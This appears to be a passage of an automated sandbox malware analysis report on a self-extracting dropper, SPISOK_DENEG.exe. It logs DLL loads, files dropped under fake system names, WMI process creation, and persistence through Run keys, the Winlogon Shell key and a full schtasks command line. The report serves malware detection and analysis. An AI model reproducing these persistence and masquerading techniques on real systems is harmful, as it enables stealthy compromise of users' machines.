                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ctfmon.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: apphelp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: version.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: sspicli.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: mscoree.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: version.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: uxtheme.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: windows.storage.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: wldp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: profapi.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptsp.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: rsaenh.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: cryptbase.dll
                                  Source: C:\Users\Default\Documents\dllhost.exeSection loaded: sspicli.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: mscoree.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: apphelp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: version.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: wldp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: profapi.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: sspicli.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: mscoree.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: version.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: uxtheme.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: windows.storage.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: wldp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: profapi.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptsp.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: rsaenh.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: cryptbase.dll
                                  Source: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeSection loaded: sspicli.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: apphelp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: mscoree.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: version.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: uxtheme.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: windows.storage.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: wldp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: profapi.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptsp.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: rsaenh.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: cryptbase.dll
                                  Source: C:\Program Files (x86)\jDownloader\config\explorer.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                  Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                                  Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: mscoree.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: version.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: uxtheme.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: windows.storage.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: wldp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: profapi.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptsp.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: rsaenh.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: cryptbase.dll
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                  Source: Window RecorderWindow detected: More than 3 window changes detected
                                  Source: SPISOK_DENEG.exeStatic file information: File size 1166640 > 1048576
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                  Source: SPISOK_DENEG.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                  Source: SPISOK_DENEG.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                  Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SPISOK_DENEG.exe
                                  Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.pdb source: ChainPortsurrogate.exe, 00000004.00000002.1795261903.00000000033B3000.00000004.00000800.00020000.00000000.sdmp
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                  Source: SPISOK_DENEG.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ji1uplb1\ji1uplb1.cmdline"Jump to behavior
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeFile created: C:\ProviderserverruntimeperfSvc\__tmp_rar_sfx_access_check_3820328Jump to behavior
                                  Source: SPISOK_DENEG.exeStatic PE information: section name: .didat
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EF640 push ecx; ret 0_2_000EF653
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeCode function: 0_2_000EEB78 push eax; ret 0_2_000EEB96
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA0FB02 pushad ; ret 4_2_00007FFD9BA0FB03
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeCode function: 4_2_00007FFD9BA08163 push ebx; ret 4_2_00007FFD9BA0816A

                                  Persistence and Installation Behavior

                                  barindex
                                  Creates processes via WMI
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                  Drops PE files with benign system names
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Program Files (x86)\jDownloader\config\explorer.exeJump to dropped file
                                  Infects executable files (exe, dll, sys, html)
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\Default\Documents\dllhost.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\CqAggkYA.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\UxRLAXDP.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Windows\debug\backgroundTaskHost.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\tHgRxHTS.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\jYNBNfNl.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Recovery\EbnrVuXczrPqjyiJGoZ.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\YsSdHCtI.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\ProviderserverruntimeperfSvc\ctfmon.exeJump to dropped file
                                  Source: C:\Users\user\Desktop\SPISOK_DENEG.exeFile created: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Program Files (x86)\jDownloader\config\explorer.exeJump to dropped file
                                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Windows\debug\backgroundTaskHost.exeJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\YsSdHCtI.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\UxRLAXDP.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\CqAggkYA.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\tHgRxHTS.logJump to dropped file
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeFile created: C:\Users\user\Desktop\jYNBNfNl.logJump to dropped file

                                  Boot Survival

                                  barindex
                                  Creates an autostart registry key pointing to binary in C:\Windows
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                  Creates an undocumented autostart registry key
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                                  Creates multiple autostart registry keys
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EbnrVuXczrPqjyiJGoZJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ChainPortsurrogateJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                  Uses schtasks.exe or at.exe to add and modify task schedules
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "ctfmonc" /sc MINUTE /mo 5 /tr "'C:\ProviderserverruntimeperfSvc\ctfmon.exe'" /f
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ctfmonJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run explorerJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
                                  Source: C:\ProviderserverruntimeperfSvc\ChainPortsurrogate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run backgroundTaskHostJump to behavior
